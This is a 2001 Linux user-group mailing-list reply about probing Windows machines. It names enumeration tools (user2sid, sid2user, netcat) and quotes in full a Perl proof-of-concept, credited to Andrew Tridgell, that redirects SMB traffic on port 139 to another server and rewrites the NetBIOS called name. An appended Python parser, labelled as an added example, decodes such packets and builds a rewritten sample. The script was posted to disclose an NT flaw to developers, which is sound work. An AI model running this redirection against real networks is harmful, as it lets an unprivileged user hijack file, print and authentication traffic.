[Gllug] DHCP/Firewalls
Jackson, Harry
HJackson at colt-telecom.com
Fri Aug 24 09:14:27 UTC 2001
> -----Original Message-----
> From: Xander D Harkness [mailto:xander at harkness.co.uk]
>
> I am told that there is a product that does this (not sure of the name)
> but prob windows (secure, errm no!).
>
> I would really like to solve this with Linux and I am sure that it is
> possible, but I do not know enough about the information coming out of a
> windows box. ie does it give user or group info when running telnet?
Have a look at the following tools that can be used on internal networks to
glean information:

user2sid
sid2user

These two complement each other and show another potential hole in Windows.

netcat

Very good, but I have not used it in anger, just playing at home. It can be
used to telnet onto Windows boxes apparently, although I have been unable to
do it.

Any of these can be used to get information from Windows boxes, and if you
are going to be letting people log in from external sources then you cannot
trust them. Netcat can be used to ensure that they will be unable to bind to
the various ports across the firewall. I imagine there are a million and one
ways that they are going to be able to do bad things if you are using
Windows. The most interesting is probably netcat, which can be used to bind to
port 139 and monitor it. This tool in the right hands can help you monitor
security. Are you trying to secure against the people who will have login
rights or from external threats across the net? If you know Perl you could
also have a look at the following. I am not sure how relevant this is to
Windows 2K but I imagine it has 139 open as well.

#!/usr/bin/perl
# This script demonstrates a major security problem with Windows
# NT4. It is based on an earlier script (paul.pl) that
# demonstrated a problem with a protocol change that Microsoft
# proposed. The change in this script takes advantage of a
# security hole pointed out by L0pht (http://www.l0pht.com/).
# What this script does is allow any unprivileged user on a NT
# Server to redirect the local SMB services to any other SMB
# server which they have an IP address for. This allows the user
# to redirect file, printer and authentication services to another
# server. This has enormous consequences for security.
# This script was written by Andrew Tridgell and is being sent to
# the CIFS discussion list so that CIFS developers become aware
# of this problem. It should be noted that the L0pht announcement
# (which predates this script) already provided an example command
# using netcat to achieve the same thing so this script does not
# actually offer malicious hackers anything more than what has
# already been widely distributed. I wrote this example so that
# the consequences would become clear to the people who are in a
# position to do something about fixing the problem.
# USAGE:
# To use this script install perl5 then run the command
#perl redirect.pl <localip> <remoteip>
# for example
#perl redirect.pl 192.168.2.13 192.168.2.10
# this would redirect any SMB connections made to the local server
# (whose IP address is 192.168.2.13) to the remote server
# 192.168.2.10. Any browsing, file access, authentication requests
# or printing done to the local server by SMB clients will be
# redirected to the remote server.
use IO::Socket;
use IO::Select;

if ($#ARGV != 1) {
    print "Usage: redirect.pl <localip> <remoteip>\n";
    exit 0;
}

my $local = $ARGV[0];
my $target = $ARGV[1];
my $smbport = "139";
my $Msg;

# this is a *SMBSERVER netbios name
my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";

print "setting up redirection from $local to $target ...\n";

# Create a local socket
$sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,
                              Proto=>'tcp',Listen=>5,Reuse=>1);

while (1) {
    print "listening on $local\n";

    # Accept a connection
    $IS = $sock1->accept() || die;

    # Open a socket to the remote host
    $OS = new IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,
                               Proto=>'tcp') || die;
    print "connected to $target\n";

    # Create a read set for select()
    $rs = new IO::Select();
    $rs->add($IS,$OS);

    $first = 1;
    $finished = 0;

    while (! $finished) {
        ($r_ready) = IO::Select->select($rs,undef,undef,undef);
        foreach $i (@$r_ready) {
            $o = $OS if $i == $IS;
            $o = $IS if $i == $OS;
            recv($i,$Msg,8192,0);
            if (! length $Msg) {
                # peer closed the connection: leave the foreach
                $finished = 1;
                last;
            }
            # 0x81 is a NetBIOS session request; bytes 5..36 hold the
            # encoded called name
            if ($first && substr($Msg,0,1) eq "\x81") {
                print "replacing called name\n";
                $msg2 = join('',substr($Msg,0,5),$netbname,
                             substr($Msg,37,length($Msg)-37));
                send($o,$msg2,0);
                $first = 0;
            } else {
                if ($i == $OS) { $Msg =~ s/Paul/Oops/mg; }
                send($o,$Msg,0);
            }
        }
    }
    # loop back to the top again
}
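An added example, not part of the original post or of the script it quotes: a Python parser for the NetBIOS session request (packet type 0x81) that the script rewrites, for logging the called and calling names seen on TCP/139. It shows that bytes 5..36 of the packet are the first-level-encoded called name and that the script's constant decodes to *SMBSERVER. The host names FILESRV1 and WKSTN07 and all function names are constructed for illustration, and name fields are assumed to carry no scope ID.

```python
import struct

SESSION_REQUEST = 0x81                               # RFC 1002 session packet type
SMBSERVER_ENC = b"CKFDENECFDEFFCFGEFFCCACACACACACA"  # $netbname from the script

def encode_nb_name(name, suffix=0x20):
    """First-level encoding: pad to 15 chars, append suffix, one letter per nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))

def decode_nb_name(encoded):
    """Inverse of encode_nb_name; returns (name, suffix) or raises ValueError."""
    if len(encoded) != 32 or any(not 0x41 <= c <= 0x50 for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii", "replace").rstrip(), raw[15]

def _read_name(payload, pos):
    """One name field: length byte 0x20, 32 encoded bytes, empty scope (0x00)."""
    if len(payload) < pos + 34 or payload[pos] != 0x20 or payload[pos + 33] != 0:
        raise ValueError("malformed or scoped name field")
    return decode_nb_name(payload[pos + 1:pos + 33]), pos + 34

def parse_session_request(packet):
    """Decode the first packet of a TCP/139 stream into called/calling names."""
    if len(packet) < 4 or packet[0] != SESSION_REQUEST:
        raise ValueError("not a NetBIOS session request")
    _, flags, length = struct.unpack(">BBH", packet[:4])
    length |= (flags & 1) << 16                      # length extension bit
    payload = packet[4:4 + length]
    (called, called_sfx), pos = _read_name(payload, 0)
    (calling, calling_sfx), _ = _read_name(payload, pos)
    return {"called": called, "called_suffix": called_sfx, "calling": calling,
            "calling_suffix": calling_sfx, "generic_called": called == "*SMBSERVER"}

def build_request(called, calling):
    """Constructed sample traffic: a well-formed session request."""
    body = (b"\x20" + encode_nb_name(called) + b"\x00" +
            b"\x20" + encode_nb_name(calling, 0x00) + b"\x00")
    return struct.pack(">BBH", SESSION_REQUEST, 0, len(body)) + body

# Constructed sample: a client's request, then the same bytes with 5..36 replaced.
ORIGINAL = build_request("FILESRV1", "WKSTN07")
REWRITTEN = ORIGINAL[:5] + SMBSERVER_ENC + ORIGINAL[37:]

if __name__ == "__main__":
    for label, pkt in (("original", ORIGINAL), ("rewritten", REWRITTEN)):
        print(label, parse_session_request(pkt))
```

Comparing the called name logged on the client side of a hop with the one that reaches the server shows whether something in between replaced it; the calling name is unchanged by the rewrite.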